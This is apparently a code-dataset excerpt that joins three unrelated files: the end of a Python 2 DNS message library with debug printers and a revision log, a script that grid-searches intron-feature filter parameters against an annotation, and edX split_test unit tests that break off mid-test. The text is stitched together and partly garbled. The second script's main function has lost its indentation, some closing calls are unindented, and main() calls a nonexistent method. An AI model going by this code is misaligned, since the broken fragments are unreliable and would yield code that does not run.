    # Whole-message packer; the MRO ensures RRpacker.__init__ (and thus
    # Packer.__init__) runs first.
    pass
class Munpacker(RRunpacker, Qunpacker, Hunpacker):
    # Whole-message unpacker, combining header/question/RR decoding.
    pass
# Routines to print an unpacker to stdout, for debugging.
# These affect the unpacker's current position!
def dumpM(u):
    # Debugging aid: decode and print an entire DNS message from unpacker u.
    # NOTE: consumes the unpacker (its offset is advanced).
    print 'HEADER:',
    (id, qr, opcode, aa, tc, rd, ra, z, rcode,
     qdcount, ancount, nscount, arcount) = u.getHeader()
    print 'id=%d,' % id,
    print 'qr=%d, opcode=%d, aa=%d, tc=%d, rd=%d, ra=%d, z=%d, rcode=%d,' \
          % (qr, opcode, aa, tc, rd, ra, z, rcode)
    if tc: print '*** response truncated! ***'
    if rcode: print '*** nonzero error code! (%d) ***' % rcode
    print '  qdcount=%d, ancount=%d, nscount=%d, arcount=%d' \
          % (qdcount, ancount, nscount, arcount)
    # Sections appear in wire order: questions, answers, authority, additional.
    for i in range(qdcount):
        print 'QUESTION %d:' % i,
        dumpQ(u)
    for i in range(ancount):
        print 'ANSWER %d:' % i,
        dumpRR(u)
    for i in range(nscount):
        print 'AUTHORITY RECORD %d:' % i,
        dumpRR(u)
    for i in range(arcount):
        print 'ADDITIONAL RECORD %d:' % i,
        dumpRR(u)
class DnsResult:
    # Parsed representation of a whole DNS response, built from a Munpacker.
    # show() mimics dig-style output; the 'args' dict carries query metadata
    # (name, qtype, rd flag, server, elapsed time, ...).

    def __init__(self,u,args):
        self.header={}
        self.questions=[]
        self.answers=[]
        self.authority=[]
        self.additional=[]
        self.args=args
        self.storeM(u)

    def show(self):
        # Pretty-print the stored result to stdout in a dig-like layout.
        import time
        print '; <<>> PDG.py 1.0 <<>> %s %s'%(self.args['name'],
            self.args['qtype'])
        opt=""
        if self.args['rd']:
            opt=opt+'recurs '
        h=self.header
        print ';; options: '+opt
        print ';; got answer:'
        print ';; ->>HEADER<<- opcode %s, status %s, id %d'%(
            h['opcode'],h['status'],h['id'])
        # Keep only the flags that are actually set.
        flags=filter(lambda x,h=h:h[x],('qr','aa','rd','ra','tc'))
        print ';; flags: %s; Ques: %d, Ans: %d, Auth: %d, Addit: %d'%(
            string.join(flags),h['qdcount'],h['ancount'],h['nscount'],
            h['arcount'])
        print ';; QUESTIONS:'
        for q in self.questions:
            print ';; %s, type = %s, class = %s'%(q['qname'],q['qtypestr'],
                q['qclassstr'])
        print
        print ';; ANSWERS:'
        for a in self.answers:
            print '%-20s %-6s %-6s %s'%(a['name'],`a['ttl']`,a['typename'],
                a['data'])
        print
        print ';; AUTHORITY RECORDS:'
        for a in self.authority:
            print '%-20s %-6s %-6s %s'%(a['name'],`a['ttl']`,a['typename'],
                a['data'])
        print
        print ';; ADDITIONAL RECORDS:'
        for a in self.additional:
            print '%-20s %-6s %-6s %s'%(a['name'],`a['ttl']`,a['typename'],
                a['data'])
        print
        # 'elapsed' is only present when the caller timed the query.
        if self.args.has_key('elapsed'):
            print ';; Total query time: %d msec'%self.args['elapsed']
        print ';; To SERVER: %s'%(self.args['server'])
        print ';; WHEN: %s'%time.ctime(time.time())

    def storeM(self,u):
        # Decode the header, then the four record sections, in wire order.
        (self.header['id'], self.header['qr'], self.header['opcode'],
         self.header['aa'], self.header['tc'], self.header['rd'],
         self.header['ra'], self.header['z'], self.header['rcode'],
         self.header['qdcount'], self.header['ancount'],
         self.header['nscount'], self.header['arcount']) = u.getHeader()
        self.header['opcodestr']=Opcode.opcodestr(self.header['opcode'])
        self.header['status']=Status.statusstr(self.header['rcode'])
        for i in range(self.header['qdcount']):
            #print 'QUESTION %d:' % i,
            self.questions.append(self.storeQ(u))
        for i in range(self.header['ancount']):
            #print 'ANSWER %d:' % i,
            self.answers.append(self.storeRR(u))
        for i in range(self.header['nscount']):
            #print 'AUTHORITY RECORD %d:' % i,
            self.authority.append(self.storeRR(u))
        for i in range(self.header['arcount']):
            #print 'ADDITIONAL RECORD %d:' % i,
            self.additional.append(self.storeRR(u))

    def storeQ(self,u):
        # Decode one question entry into a dict.
        q={}
        q['qname'], q['qtype'], q['qclass'] = u.getQuestion()
        q['qtypestr']=Type.typestr(q['qtype'])
        q['qclassstr']=Class.classstr(q['qclass'])
        return q

    def storeRR(self,u):
        # Decode one resource record; prefer the type-specific get<TYPE>data
        # helper when the unpacker has one, otherwise keep raw RDATA bytes.
        r={}
        r['name'],r['type'],r['class'],r['ttl'],r['rdlength'] = u.getRRheader()
        r['typename'] = Type.typestr(r['type'])
        r['classstr'] = Class.classstr(r['class'])
        #print 'name=%s, type=%d(%s), class=%d(%s), ttl=%d' \
        #      % (name,
        #        type, typename,
        #        klass, Class.classstr(class),
        #        ttl)
        mname = 'get%sdata' % r['typename']
        if hasattr(u, mname):
            r['data']=getattr(u, mname)()
        else:
            r['data']=u.getbytes(r['rdlength'])
        return r
def dumpQ(u):
    # Debugging aid: decode and print one question entry from unpacker u.
    qname, qtype, qclass = u.getQuestion()
    print 'qname=%s, qtype=%d(%s), qclass=%d(%s)' \
          % (qname,
             qtype, Type.typestr(qtype),
             qclass, Class.classstr(qclass))
def dumpRR(u):
    # Debugging aid: decode and print one resource record from unpacker u.
    name, type, klass, ttl, rdlength = u.getRRheader()
    typename = Type.typestr(type)
    print 'name=%s, type=%d(%s), class=%d(%s), ttl=%d' \
          % (name,
             type, typename,
             klass, Class.classstr(klass),
             ttl)
    mname = 'get%sdata' % typename
    if hasattr(u, mname):
        # A type-specific decoder is available.
        print '  formatted rdata:', getattr(u, mname)()
    else:
        print '  binary rdata:', u.getbytes(rdlength)
if __name__ == "__main__":
testpacker()
#
# $Log: Lib.py,v $
# Revision 1.11.2.7 2009/06/09 18:39:06 customdesigned
# Built-in SPF support
#
# Revision 1.11.2.6 2008/10/15 22:34:06 customdesigned
# Default to idna encoding.
#
# Revision 1.11.2.5 2008/09/17 17:35:14 customdesigned
# Use 7-bit ascii encoding, because case folding needs to be disabled
# before utf8 is safe to use, even experimentally.
#
# Revision 1.11.2.4 2008/09/17 16:09:53 customdesigned
# Encode unicode labels as UTF-8
#
# Revision 1.11.2.3 2007/05/22 20:27:40 customdesigned
# Fix unpacker underflow.
#
# Revision 1.11.2.2 2007/05/22 20:25:53 customdesigned
# Use socket.inetntoa,inetaton.
#
# Revision 1.11.2.1 2007/05/22 20:20:39 customdesigned
# Mark utf-8 encoding
#
# Revision 1.11 2002/03/19 13:05:02 anthonybaxter
# converted to class based exceptions (there goes the python1.4 compatibility :)
#
# removed a quite gross use of 'eval()'.
#
# Revision 1.10 2002/03/19 12:41:33 anthonybaxter
# tabnannied and reindented everything. 4 space indent, no tabs.
# yay.
#
# Revision 1.9 2002/03/19 10:30:33 anthonybaxter
# first round of major bits and pieces. The major stuff here (summarised
# from my local, off-net CVS server :/ this will cause some oddities with
# the
#
# tests/testPackers.py:
# a large slab of unit tests for the packer and unpacker code in DNS.Lib
#
# DNS/Lib.py:
# placeholder for addSRV.
# added 'klass' to addA, make it the same as the other A* records.
# made addTXT check for being passed a string, turn it into a length 1 list.
# explicitly check for adding a string of length > 255 (prohibited).
# a bunch of cleanups from a first pass with pychecker
# new code for pack/unpack. the bitwise stuff uses struct, for a smallish
# (disappointly small, actually) improvement, while addr2bin is much
# much faster now.
#
# DNS/Base.py:
# added DiscoverNameServers. This automatically does the right thing
# on unix/ win32. No idea how MacOS handles this. *sigh*
# Incompatible change: Don't use ParseResolvConf on non-unix, use this
# function, instead!
# a bunch of cleanups from a first pass with pychecker
#
# Revision 1.8 2001/08/09 09:08:55 anthonybaxter
# added identifying header to top of each file
#
# Revision 1.7 2001/07/19 07:50:44 anthony
# Added SRV (RFC 2782) support. Code from Michael Ströder.
#
# Revision 1.6 2001/07/19 07:39:18 anthony
# 'type' -> 'rrtype' in getRRheader(). Fix from Michael Ströder.
#
# Revision 1.5 2001/07/19 07:34:19 anthony
# oops. glitch in storeRR (fixed now).
# Reported by Bastian Kleineidam and by greg lin.
#
# Revision 1.4 2001/07/19 07:16:42 anthony
# Changed (opcode&0xF)<<11 to (opcode*0xF)<<11.
# Patch from Timothy J. Miller.
#
# Revision 1.3 2001/07/19 06:57:07 anthony
# cvs keywords added
#
#
| mit |
ratschlab/RNA-geeq | SAFT/find_optimal_param_set.py | 1 | 11493 | """
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 3 of the License, or
(at your option) any later version.
Written (W) 2009-2010 Andre Kahles
Copyright (C) 2009-2010 by Friedrich Miescher Laboratory, Tuebingen, Germany
This script finds an optimal parameter set to maximize the performance of a
given intronfeature file.
For detailed usage information type:
python find_optimal_param_set.py
"""
import sys
import cPickle
class Feature(object):
    """Intron feature: support counters plus per-alignment statistics.

    Each alignment contributes a (min exon overlap, mismatches) pair that is
    encoded as a single integer key: ex * (max_mm + 1) + mm.
    """

    def __init__(self, max_mm=80, feature_string=''):
        """Create a feature, optionally initialised from the tab-split fields
        of a feature-file line (two support counts followed by "key:count"
        pairs)."""
        self.max_mm = max_mm + 1
        self.mm_ex = dict()
        if feature_string == '':
            self.alignment_support = 0
            self.submission_support = 1
        else:
            self.alignment_support = int(feature_string[0])
            self.submission_support = int(feature_string[1])
            for _sl in feature_string[2:]:
                (key, value) = _sl.split(':')
                self.mm_ex[key] = int(value)

    def merge_features(self, feature_string):
        """Merges information in feature_string into current feature object"""
        self.alignment_support += int(feature_string[0])
        self.submission_support += int(feature_string[1])
        for _sl in feature_string[2:]:
            (key, value) = _sl.split(':')
            self.mm_ex[key] = self.mm_ex.get(key, 0) + int(value)

    def add_mm_ex(self, ex, mm):
        """Record one alignment with exon overlap *ex* and *mm* mismatches."""
        self.alignment_support += 1
        key = (ex * self.max_mm) + mm
        self.mm_ex[key] = self.mm_ex.get(key, 0) + 1

    def get_feature_string(self):
        """Return the tab-separated serialisation (no trailing tab)."""
        _line = (str(self.alignment_support) + '\t' + str(self.submission_support) + '\t')
        for key in self.mm_ex:
            _line += (str(key) + ':' + str(self.mm_ex[key]) + '\t')
        return _line[:-1]

    def get_submission_support(self):
        """Returns submission support"""
        return int(self.submission_support)

    def is_valid(self, mm, ex, mc, options):
        """Return True if the min-coverage *mc* is met and at least one
        alignment has <= *mm* mismatches and >= *ex* exon overlap."""
        if self.alignment_support < mc:
            return False
        for key in self.mm_ex:
            # Keys encode (ex, mm) as ex * (max_feat_mismatches + 1) + mm.
            # Use floor division explicitly: identical under Python 2's
            # classic division and still correct under Python 3.
            _ex = int(key) // (options.max_feat_mismatches + 1)
            _mm = int(key) % (options.max_feat_mismatches + 1)
            if _mm <= mm and _ex >= ex:
                return True
        return False
def parse_options(argv):
    """Parse command-line options from *argv* (sys.argv style).

    Returns the optparse options object.  Prints the help text and exits
    with status 2 when no arguments were given.
    """
    from optparse import OptionParser, OptionGroup
    parser = OptionParser()
    required = OptionGroup(parser, 'REQUIRED')
    required.add_option('-b', '--best_score', dest='best_scores', metavar='FILE', help='file to store the best scoring parameters', default='-')
    required.add_option('-m', '--matrix', dest='matrix', metavar='FILE', help='file to store the full performance matrix', default='-')
    required.add_option('-f', '--features', dest='features', metavar='FILE', help='alignment intron features', default='-')
    required.add_option('-i', '--annotation_introns', dest='anno_int', metavar='FILE', help='annotation intron list', default='-')
    optional = OptionGroup(parser, 'OPTIONAL')
    optional.add_option('-E', '--exclude_introns', dest='exclude_introns', metavar='STRINGLIST', help='list of comma separated intron files to exclude from submitted features', default='-')
    optional.add_option('-I', '--max_intron_len', dest='max_intron_len', metavar='INT', type='int', help='maximal intron length [10000000]', default=10000000)
    optional.add_option('-s', '--ignore_strand', dest='ignore_strand', action='store_true', help='ignore strand information present in annotation', default=False)
    optional.add_option('-X', '--max_feat_mismatches', dest='max_feat_mismatches', metavar='INT', type='int', help='max number of mismatches for feat generation [80] (do only change, if you are absolutely sure!)', default=80)
    optional.add_option('-v', '--verbose', dest='verbose', action='store_true', help='verbosity', default=False)
    parser.add_option_group(required)
    parser.add_option_group(optional)
    # BUG FIX: the function previously ignored its *argv* parameter and let
    # optparse read sys.argv implicitly; parse the argument we were given.
    (options, args) = parser.parse_args(argv[1:])

    if len(argv) < 2:
        parser.print_help()
        sys.exit(2)

    return options
def get_performance_value(full_features, mm, ex, mc, annotation_list, options):
    """Filter the alignment features with (mm, ex, mc) and compare the
    resulting intron set to the annotation.

    Returns a (precision, recall) tuple, each averaged over the chromosomes
    that contribute at least one matching intron.
    """
    alignment_list = dict()
    for feat in full_features.keys():
        chrm = feat[0]
        intron = (0, int(feat[1]), int(feat[2]))
        # filter step: drop over-long introns ...
        if (intron[2] - intron[1]) > options.max_intron_len:
            continue
        # ... and features that fail the mismatch/overlap/coverage filter
        if not full_features[feat].is_valid(mm, ex, mc, options):
            continue
        try:
            alignment_list[chrm][intron] = 0
        except KeyError:
            alignment_list[chrm] = {intron: 0}

    ### match intron lists
    total_precision = float(0)
    total_recall = float(0)
    key_count = 0
    for chrm in annotation_list.keys():
        # dict.has_key() is deprecated (and removed in Python 3); use `in`.
        if chrm in alignment_list:
            matches = len(set(annotation_list[chrm].keys()).intersection(set(alignment_list[chrm].keys())))
            total_precision += (float(matches) / float(max(1, len(alignment_list[chrm].keys()))))
            total_recall += (float(matches) / float(max(1, len(annotation_list[chrm].keys()))))
            ### do not include chromosomes with zero values into average
            if matches > 0:
                key_count += 1
    total_precision /= max(1.0, float(key_count))
    total_recall /= max(1.0, float(key_count))

    return (total_precision, total_recall)
def main():
"""Main function extracting intron features."""
options = parse_options(sys.argv)
### get list of annotated introns
annotation_list = cPickle.load(open(options.anno_int, 'r'))
if options.ignore_strand:
for chrm in annotation_list.keys():
skiplist = set()
for intron in annotation_list[chrm].keys():
if intron[0] == 0:
continue
annotation_list[chrm][(0, intron[1], intron[2])] = annotation_list[chrm][intron]
skiplist.add(intron)
for intron in skiplist:
del annotation_list[chrm][intron]
del skiplist
### filter annotation for max intron length
print '\nFiltering intron list for max intron len'
print '-----------------------------------------'
skipped = 0
for chrm in annotation_list.keys():
skiplist = set()
for intron in annotation_list[chrm].keys():
if (intron[2] - intron[1]) > options.max_intron_len:
skiplist.add(intron)
for intron in skiplist:
del annotation_list[chrm][intron]
skipped += len(skiplist)
print '%s introns removed from annotation' % skipped
del skiplist
full_features = dict()
if options.verbose:
print 'Parsing %s' % options.features
line_counter = 0
for line in open(options.features, 'r'):
if options.verbose and line_counter % 1000 == 0:
print 'parsed %i features from %s' % (line_counter, options.features)
line_counter += 1
sl = line.strip().split('\t')
(chrm, start, stop) = sl[:3]
try:
full_features[(chrm, start, stop)].full_features(sl[3:])
except KeyError:
full_features[(chrm, start, stop)] = Feature(80, sl[3:])
### filter full feature list for excluded introns
if options.exclude_introns != '-':
_ex_introns = options.exclude_introns.strip().split(',')
### handle leading or trailing commas
if _ex_introns[0] == '':
_ex_introns = _ex_introns[1:]
if _ex_introns[-1] == '':
_ex_introns = _ex_introns[:-1]
for _infile in _ex_introns:
_ex_intron = cPickle.load(open(_infile, 'r'))
for chrm in _ex_intron.keys():
for _intron in _ex_intron[chrm].keys():
try:
del full_features[(chrm, str(_intron[1]), str(_intron[2]))]
except KeyError:
continue
del _ex_intron
if options.verbose:
print 'Parsing completed.'
print 'parsed %i features from %s' % (line_counter, options.features)
### SEARCH SPACE
### iterate over different filter dimensions
#ex_list = [2, 4, 6, 8, 10, 12, 15, 20, 25, 30] # 10
#ex_list = [2, 4, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18 ] # 15
ex_list = [1, 2, 4, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 18 ] # 15
mm_list = [0, 1, 2, 3, 4, 5, 6] # 7
mc_list = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10] # 10 ==> 700 combinations
checked_combs = 0
# pre rec fsc
max_pre = (0.0, 0.0, 0.0)
max_rec = (0.0, 0.0, 0.0)
max_fsc = (0.0, 0.0, 0.0)
max_pre_idx = (0, 0, 0)
max_rec_idx = (0, 0, 0)
max_fsc_idx = (0, 0, 0)
matrix_file = open(options.matrix, 'w')
for ex in ex_list:
for mm in mm_list:
for mc in mc_list:
if options.verbose and checked_combs % 10 == 0:
print 'checked %i parameter combinations' % checked_combs
print 'best scores so far:\n \tbest fScore: %0.2f, best recall: %0.2f, best precision: %0.2f' % (max_fsc[2], max_rec[1], max_pre[0])
checked_combs += 1
(pre, rec) = get_performance_value(full_features, mm, ex, mc, annotation_list, options)
if float(rec) + float(pre) > 0:
fsc = (2 * float(rec) * float(pre)) / (float(rec) + float(pre))
else:
fsc = 0.0
if pre > max_pre[0]:
max_pre = (pre, rec, fsc)
max_pre_idx = (ex, mm, mc)
if rec > max_rec[1]:
max_rec = (pre, rec, fsc)
max_rec_idx = (ex, mm, mc)
if fsc > max_fsc[2]:
max_fsc = (pre, rec, fsc)
max_fsc_idx = (ex, mm, mc)
### store information
### ex mm mc pre rec fsc
print >> matrix_file, '%s\t%s\t%s\t%s\t%s\t%s' % (ex, mm, mc, pre, rec, fsc)
matrix_file.close()
best_file = open(options.best_scores, 'w')
# best precision
print >> best_file, '%s\t%s\t%s\t%s\t%s\t%s' % (max_pre_idx[0], max_pre_idx[1], max_pre_idx[2], max_pre[0], max_pre[1], max_pre[2])
# best recall
print >> best_file, '%s\t%s\t%s\t%s\t%s\t%s' % (max_rec_idx[0], max_rec_idx[1], max_rec_idx[2], max_rec[0], max_rec[1], max_rec[2])
# best fScore
print >> best_file, '%s\t%s\t%s\t%s\t%s\t%s' % (max_fsc_idx[0], max_fsc_idx[1], max_fsc_idx[2], max_fsc[0], max_fsc[1], max_fsc[2])
best_file.close()
if __name__ == "__main__":
main()
| mit |
don-github/edx-platform | common/lib/xmodule/xmodule/tests/test_split_test_module.py | 44 | 23169 | """
Tests for the Split Testing Module
"""
import ddt
import lxml
from mock import Mock, patch
from fs.memoryfs import MemoryFS
from xmodule.partitions.tests.test_partitions import StaticPartitionService, PartitionTestCase, MockUserPartitionScheme
from xmodule.tests.xml import factories as xml
from xmodule.tests.xml import XModuleXmlImportTest
from xmodule.tests import get_test_system
from xmodule.x_module import AUTHOR_VIEW, STUDENT_VIEW
from xmodule.validation import StudioValidationMessage
from xmodule.split_test_module import SplitTestDescriptor, SplitTestFields, get_split_user_partitions
from xmodule.partitions.partitions import Group, UserPartition
class SplitTestModuleFactory(xml.XmlImportFactory):
    """
    Factory for generating SplitTestModules for testing purposes
    """
    # XML tag this factory emits; the import system dispatches on it.
    tag = 'split_test'
class SplitTestUtilitiesTest(PartitionTestCase):
    """
    Tests for utility methods related to split_test module.
    """
    def test_split_user_partitions(self):
        """
        Tests the get_split_user_partitions helper method.
        """
        # Two partitions with the "random" scheme: both should be returned.
        first_random_partition = UserPartition(
            0, 'first_partition', 'First Partition', [Group("0", 'alpha'), Group("1", 'beta')],
            self.random_scheme
        )
        second_random_partition = UserPartition(
            0, 'second_partition', 'Second Partition', [Group("4", 'zeta'), Group("5", 'omega')],
            self.random_scheme
        )
        all_partitions = [
            first_random_partition,
            # Only UserPartitions with scheme "random" will be returned as available options.
            UserPartition(
                1, 'non_random_partition', 'Will Not Be Returned', [Group("1", 'apple'), Group("2", 'banana')],
                self.non_random_scheme
            ),
            second_random_partition
        ]
        # The result preserves the input ordering of the random partitions.
        self.assertEqual(
            [first_random_partition, second_random_partition],
            get_split_user_partitions(all_partitions)
        )
class SplitTestModuleTest(XModuleXmlImportTest, PartitionTestCase):
    """
    Base class for all split_module tests.
    """
    def setUp(self):
        # Build a minimal course containing one split_test block with two
        # HTML children (one per experiment group), then bind it to a mock
        # student so child selection can run.
        super(SplitTestModuleTest, self).setUp()
        self.course_id = 'test_org/test_course_number/test_run'
        # construct module
        course = xml.CourseFactory.build()
        sequence = xml.SequenceFactory.build(parent=course)
        split_test = SplitTestModuleFactory(
            parent=sequence,
            attribs={
                'user_partition_id': '0',
                'group_id_to_child': '{"0": "i4x://edX/xml_test_course/html/split_test_cond0", "1": "i4x://edX/xml_test_course/html/split_test_cond1"}'
            }
        )
        # One HTML child per experiment group.
        xml.HtmlFactory(parent=split_test, url_name='split_test_cond0', text='HTML FOR GROUP 0')
        xml.HtmlFactory(parent=split_test, url_name='split_test_cond1', text='HTML FOR GROUP 1')

        self.course = self.process_xml(course)
        self.course_sequence = self.course.get_children()[0]
        self.module_system = get_test_system()

        self.module_system.descriptor_runtime = self.course._runtime  # pylint: disable=protected-access
        self.course.runtime.export_fs = MemoryFS()

        # Partition service exposing the test partition (id 0, from
        # PartitionTestCase) plus an unrelated second partition.
        user = Mock(username='ma', email='ma@edx.org', is_staff=False, is_active=True)
        self.partitions_service = StaticPartitionService(
            [
                self.user_partition,
                UserPartition(
                    1, 'second_partition', 'Second Partition',
                    [Group("0", 'abel'), Group("1", 'baker'), Group("2", 'charlie')],
                    MockUserPartitionScheme()
                )
            ],
            user=user,
            course_id=self.course.id,
            track_function=Mock(name='track_function'),
        )
        self.module_system._services['partitions'] = self.partitions_service  # pylint: disable=protected-access

        # Bind the split_test module to the mock student.
        self.split_test_module = self.course_sequence.get_children()[0]
        self.split_test_module.bind_for_student(
            self.module_system,
            user.id
        )
@ddt.ddt
class SplitTestModuleLMSTest(SplitTestModuleTest):
    """
    Test the split test module
    """

    @ddt.data((0, 'split_test_cond0'), (1, 'split_test_cond1'))
    @ddt.unpack
    def test_child(self, user_tag, child_url_name):
        """The child descriptor matches the group the user is assigned to."""
        self.user_partition.scheme.current_group = self.user_partition.groups[user_tag]
        # assertEquals is a deprecated alias of assertEqual (removed in Python 3.12).
        self.assertEqual(self.split_test_module.child_descriptor.url_name, child_url_name)

    @ddt.data((0, 'HTML FOR GROUP 0'), (1, 'HTML FOR GROUP 1'))
    @ddt.unpack
    def test_get_html(self, user_tag, child_content):
        """Rendering the split test shows only the assigned group's content."""
        self.user_partition.scheme.current_group = self.user_partition.groups[user_tag]
        self.assertIn(
            child_content,
            self.module_system.render(self.split_test_module, STUDENT_VIEW).content
        )

    @ddt.data(0, 1)
    def test_child_missing_tag_value(self, _user_tag):
        # If user_tag has a missing value, we should still get back a valid child url
        self.assertIn(self.split_test_module.child_descriptor.url_name, ['split_test_cond0', 'split_test_cond1'])

    @ddt.data(100, 200, 300, 400, 500, 600, 700, 800, 900, 1000)
    def test_child_persist_new_tag_value_when_tag_missing(self, _user_tag):
        # If a user_tag has a missing value, a group should be saved/persisted for that user.
        # So, we check that we get the same url_name when we call on the url_name twice.
        # We run the test ten times so that, if our storage is failing, we'll be most likely to notice it.
        self.assertEqual(self.split_test_module.child_descriptor.url_name, self.split_test_module.child_descriptor.url_name)

    # Patch the definition_to_xml for the html children.
    @patch('xmodule.html_module.HtmlDescriptor.definition_to_xml')
    def test_export_import_round_trip(self, def_to_xml):
        """Exporting a split_test to XML and re-importing preserves its fields."""
        # The HtmlDescriptor definition_to_xml tries to write to the filesystem
        # before returning an xml object. Patch this to just return the xml.
        def_to_xml.return_value = lxml.etree.Element('html')

        # Mock out the process_xml
        # Expect it to return a child descriptor for the SplitTestDescriptor when called.
        self.module_system.process_xml = Mock()

        # Write out the xml.
        xml_obj = self.split_test_module.definition_to_xml(MemoryFS())
        self.assertEqual(xml_obj.get('user_partition_id'), '0')
        self.assertIsNotNone(xml_obj.get('group_id_to_child'))

        # Read the xml back in.
        fields, children = SplitTestDescriptor.definition_from_xml(xml_obj, self.module_system)
        self.assertEqual(fields.get('user_partition_id'), '0')
        self.assertIsNotNone(fields.get('group_id_to_child'))
        self.assertEqual(len(children), 2)
class SplitTestModuleStudioTest(SplitTestModuleTest):
    """
    Unit tests for how split test interacts with Studio.
    """

    @patch('xmodule.split_test_module.SplitTestDescriptor.group_configuration_url', return_value='http://example.com')
    def test_render_author_view(self, group_configuration_url):
        """
        Test the rendering of the Studio author view.
        """
        def create_studio_context(root_xblock):
            """
            Context for rendering the studio "author_view".
            """
            return {
                'reorderable_items': set(),
                'root_xblock': root_xblock,
            }

        # The split_test module should render both its groups when it is the root
        context = create_studio_context(self.split_test_module)
        html = self.module_system.render(self.split_test_module, AUTHOR_VIEW, context).content
        self.assertIn('HTML FOR GROUP 0', html)
        self.assertIn('HTML FOR GROUP 1', html)

        # When rendering as a child, it shouldn't render either of its groups
        context = create_studio_context(self.course_sequence)
        html = self.module_system.render(self.split_test_module, AUTHOR_VIEW, context).content
        self.assertNotIn('HTML FOR GROUP 0', html)
        self.assertNotIn('HTML FOR GROUP 1', html)

        # The "Create Missing Groups" button should be rendered when groups are missing
        context = create_studio_context(self.split_test_module)
        self.split_test_module.user_partitions = [
            UserPartition(0, 'first_partition', 'First Partition',
                          [Group("0", 'alpha'), Group("1", 'beta'), Group("2", 'gamma')])
        ]
        html = self.module_system.render(self.split_test_module, AUTHOR_VIEW, context).content
        self.assertIn('HTML FOR GROUP 0', html)
        self.assertIn('HTML FOR GROUP 1', html)

    def test_group_configuration_url(self):
        """
        Test creation of correct Group Configuration URL.
        """
        mocked_course = Mock(advanced_modules=['split_test'])
        mocked_modulestore = Mock()
        mocked_modulestore.get_course.return_value = mocked_course
        self.split_test_module.system.modulestore = mocked_modulestore
        self.split_test_module.user_partitions = [
            UserPartition(0, 'first_partition', 'First Partition', [Group("0", 'alpha'), Group("1", 'beta')])
        ]
        expected_url = '/group_configurations/edX/xml_test_course/101#0'
        self.assertEqual(expected_url, self.split_test_module.group_configuration_url)

    def test_editable_settings(self):
        """
        Test the setting information passed back from editable_metadata_fields.
        """
        editable_metadata_fields = self.split_test_module.editable_metadata_fields
        self.assertIn(SplitTestDescriptor.display_name.name, editable_metadata_fields)
        self.assertNotIn(SplitTestDescriptor.due.name, editable_metadata_fields)
        self.assertNotIn(SplitTestDescriptor.user_partitions.name, editable_metadata_fields)

        # user_partition_id will always appear in editable_metadata_settings, regardless
        # of the selected value.
        self.assertIn(SplitTestDescriptor.user_partition_id.name, editable_metadata_fields)

    def test_non_editable_settings(self):
        """
        Test the settings that are marked as "non-editable".
        """
        non_editable_metadata_fields = self.split_test_module.non_editable_metadata_fields
        self.assertIn(SplitTestDescriptor.due, non_editable_metadata_fields)
        self.assertIn(SplitTestDescriptor.user_partitions, non_editable_metadata_fields)
        self.assertNotIn(SplitTestDescriptor.display_name, non_editable_metadata_fields)

    def test_available_partitions(self):
        """
        Tests that the available partitions are populated correctly when editable_metadata_fields are called
        """
        self.assertEqual([], SplitTestDescriptor.user_partition_id.values)

        # user_partitions is empty, only the "Not Selected" item will appear.
        self.split_test_module.user_partition_id = SplitTestFields.no_partition_selected['value']
        self.split_test_module.editable_metadata_fields # pylint: disable=pointless-statement
        partitions = SplitTestDescriptor.user_partition_id.values
        self.assertEqual(1, len(partitions))
        self.assertEqual(SplitTestFields.no_partition_selected['value'], partitions[0]['value'])

        # Populate user_partitions and call editable_metadata_fields again
        self.split_test_module.user_partitions = [
            UserPartition(
                0, 'first_partition', 'First Partition', [Group("0", 'alpha'), Group("1", 'beta')],
                self.random_scheme
            ),
            # Only UserPartitions with scheme "random" will be returned as available options.
            UserPartition(
                1, 'non_random_partition', 'Will Not Be Returned', [Group("1", 'apple'), Group("2", 'banana')],
                self.non_random_scheme
            )
        ]
        self.split_test_module.editable_metadata_fields # pylint: disable=pointless-statement
        partitions = SplitTestDescriptor.user_partition_id.values
        self.assertEqual(2, len(partitions))
        self.assertEqual(SplitTestFields.no_partition_selected['value'], partitions[0]['value'])
        self.assertEqual(0, partitions[1]['value'])
        self.assertEqual("first_partition", partitions[1]['display_name'])

        # Try again with a selected partition and verify that there is no option for "No Selection"
        self.split_test_module.user_partition_id = 0
        self.split_test_module.editable_metadata_fields # pylint: disable=pointless-statement
        partitions = SplitTestDescriptor.user_partition_id.values
        self.assertEqual(1, len(partitions))
        self.assertEqual(0, partitions[0]['value'])
        self.assertEqual("first_partition", partitions[0]['display_name'])

        # Finally try again with an invalid selected partition and verify that "No Selection" is an option
        self.split_test_module.user_partition_id = 999
        self.split_test_module.editable_metadata_fields # pylint: disable=pointless-statement
        partitions = SplitTestDescriptor.user_partition_id.values
        self.assertEqual(2, len(partitions))
        self.assertEqual(SplitTestFields.no_partition_selected['value'], partitions[0]['value'])
        self.assertEqual(0, partitions[1]['value'])
        self.assertEqual("first_partition", partitions[1]['display_name'])

    def test_active_and_inactive_children(self):
        """
        Tests the active and inactive children returned for different split test configurations.
        """
        split_test_module = self.split_test_module
        children = split_test_module.get_children()

        # Verify that a split test has no active children if it has no specified user partition.
        split_test_module.user_partition_id = -1
        [active_children, inactive_children] = split_test_module.active_and_inactive_children()
        self.assertEqual(active_children, [])
        self.assertEqual(inactive_children, children)

        # Verify that all the children are returned as active for a correctly configured split_test
        split_test_module.user_partition_id = 0
        split_test_module.user_partitions = [
            UserPartition(0, 'first_partition', 'First Partition', [Group("0", 'alpha'), Group("1", 'beta')])
        ]
        [active_children, inactive_children] = split_test_module.active_and_inactive_children()
        self.assertEqual(active_children, children)
        self.assertEqual(inactive_children, [])

        # Verify that a split_test does not return inactive children in the active children
        # (the local alias is used consistently throughout this test).
        split_test_module.user_partitions = [
            UserPartition(0, 'first_partition', 'First Partition', [Group("0", 'alpha')])
        ]
        [active_children, inactive_children] = split_test_module.active_and_inactive_children()
        self.assertEqual(active_children, [children[0]])
        self.assertEqual(inactive_children, [children[1]])

        # Verify that a split_test ignores misconfigured children
        split_test_module.user_partitions = [
            UserPartition(0, 'first_partition', 'First Partition', [Group("0", 'alpha'), Group("2", 'gamma')])
        ]
        [active_children, inactive_children] = split_test_module.active_and_inactive_children()
        self.assertEqual(active_children, [children[0]])
        self.assertEqual(inactive_children, [children[1]])

        # Verify that a split_test referring to a non-existent user partition has no active children
        split_test_module.user_partition_id = 2
        [active_children, inactive_children] = split_test_module.active_and_inactive_children()
